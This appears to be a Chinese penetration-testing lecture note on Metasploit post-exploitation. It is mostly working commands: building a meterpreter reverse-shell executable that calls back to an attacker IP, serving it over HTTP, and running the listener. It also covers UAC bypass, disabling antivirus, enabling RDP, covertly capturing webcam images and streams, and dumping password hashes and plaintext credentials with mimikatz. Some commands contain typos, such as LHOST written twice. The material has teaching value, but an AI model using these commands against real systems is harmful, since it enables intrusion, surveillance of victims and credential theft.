T3SEC —–第七讲:后渗透信息收集

{% meting "2111364820" "tencent" "playlist" "theme:#FF4081" "mode:circulation" "mutex:true" "listmaxheight:200px" "preload:auto" "autoplay" %}

反弹连接木马获取shell

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.102 LHOST=4444 -f exe > 2020shell.exe
  • python -m SimpleHTTPServer 8080 //开启http服务
  • Msf开启监听:
    • -use exploit/multi/handler
    • -set payload windows/meterpreter/reverse_tcp
    • -set lhost 192.168.1.104
    • -set lport 4444
    • -run

msfvenom -p windows/meterpreter/reverse_tcp //类型 LHOST=192.168.56.102 //ip地址 LPORT=4444 //服务端口 -f //指定生成数据类型 exe > 27shell.exe //生成

python -m SimpleHTTPServer 8080 启动http服务

msfconsle开始监听

.......

getuid可查看当前权限

权限提升

-UAC(User Account Control,用户账户控制)

  • 要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员密码.

UAC绕过提权

  • Exploit/windows/local/ask

//高等级执行绕过uac--需要用户确认

  • use exploit/windows/local/bypassuac

//无弹窗的uac绕过

信息收集

  • Msf下进行信息收集

-Run post /windows/gather/forensics/enum_drives //获取目标机器的分区情况

-Run post /windows/gather/checkvm //判断是否为虚拟机

-Run post /windows/gather/enum_services //开启那些服务

-Run post /windows/gather/enum_applications //安装了哪些应用

-Run post /windows/gather/enum_shares //查看共享

-Run post /windows/gather/dunmlinks** //获取主机最近的系统操作

-Run post /windows/gather/enum_applications 查看补丁

  • Run Scraper //脚本 -偏于网络

  • Run Winenum //脚本 -偏于整体

  • Run post/windows/manage/killav //命令关闭目标机系统杀毒软件

  • Run post/windows/manage/enable_rdp //命令启动目标机的远程桌面协议,也就是常说的3389端口

  • Run post/windows/manage/autoroute //命令查看目标机的本地子网情况

  • Run post/windows/gather/enum_logged_on_users 命令列举当前有多少用户登陆了目标机

  • Run post/windows/gather/enum_applications //命令列举安装在目标机上的应用程序

  • Screenshot //截图

  • webcam_list //查看目标机是否有摄像头

  • webcam_snap //打开目标摄像头,拍一张照片

  • webcam_stream //开启直播模式

  • shll 进入到目标机的shell下面

  • exit //停止 meterpreter 会话

文件系统命令:

  • pwd或getwd: 查看当前处于目标机的哪个目录
  • getlwd //查看当前处于本地的哪个目录
  • ls //列出当前文件目录中的所有文件
  • cd //切换目录
  • *search -f * .txt -d c:* //可以搜索c盘中所有以 .txt 为扩展名的文件,其中-f参数用于指定搜索文件模式 -d 参数用于指定在哪个目录下进行搜索

hash破解登陆密码:

meterpreter > load mimikatz //启动mimikatz 模块

meterpreter > help //查看帮助

meterpreter > msv //获取登陆密码的hash值

meterpreter > mimikatz_command -f samdump::hashes //获取登陆密码的hash值

meterpreter > ssp //获取的是明文信息

meterpreter > tspkg //获取的是明文信息

meterpreter > wdigest //读取内存中存放的账号密码明文信息

meterpreter > kerberos //获取明文密码

Q.E.D.